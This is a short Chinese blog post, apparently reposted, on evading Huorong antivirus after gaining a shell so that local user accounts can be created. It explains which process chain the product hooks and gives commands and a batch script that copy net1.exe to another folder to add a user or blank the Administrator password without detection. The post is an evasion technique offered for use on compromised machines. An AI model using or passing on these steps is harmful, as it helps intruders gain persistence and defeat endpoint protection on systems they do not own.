admin 管理员组

文章数量: 1184232

在拿了shell上线了的情况下,通过net user add新建用户经常会被杀软拦截拒绝访问,以比较常用的火绒和360为例,简单说一下绕过的小tips

火绒绒

可以看到通过net user命令新建用户,火绒拦了,检测的是cmd.exe去执行C:\Windows\System32\net.exe

把C:\Windows\System32\net.exe复制出来放到别的文件夹下,这里我放在test里面

重新执行net.exe user huorong 123 /add ,可以看到现在火绒检测的是net.exe去操作C:\Windows\System32\net1.exe

同理,把net1.exe复制出来去执行,成功执行了新建用户,且火绒没有提示

挺简单暴力的一个方式,综上可以看到火绒hook的是

cmd.exe -> C:\Windows\System32\net.exe -> C:\Windows\System32\net1.exe

bat脚本实现

@echo off  
copy C:\Windows\System32\net1.exe
net1.exe user Administrator ""

 copy 要复制的文件路径   执行后可以直接把要复制的文件复制到当前路径

本文标签: NET User

版权声明:本文标题:绕过火绒执行net user 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.roclinux.cn/b/1763887518a3276981.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。